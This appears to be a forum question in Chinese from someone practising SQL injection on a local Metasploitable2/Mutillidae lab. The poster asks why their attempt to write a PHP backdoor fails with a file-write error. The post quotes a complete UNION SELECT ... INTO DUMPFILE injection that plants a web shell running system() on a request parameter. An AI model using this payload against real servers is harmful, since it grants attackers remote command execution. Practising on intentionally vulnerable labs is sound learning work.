我目前正在使用 php 后门程序在我的本地服务器（metasploitable2 mutillidate）上种植 php 文件。我找出了它有多少列并制作了一个简单的代码。

' UNION SELECT null, null, null, null, '<?php if(isset($_REQUEST["cmd"])){ 

echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; 

}?>' INTO DUMPFILE '/var/www/mutillidae/backdoor.php' -- 

我将此代码编码为 url 表单并提交，但我失败了。

它给了我与到目前为止不同的错误，但仍然不起作用。

错误说：'执行查询时出错：无法创建/写入文件'/var/www/mutillidae/backdoor.php'

我想这与特权有关，但我不确定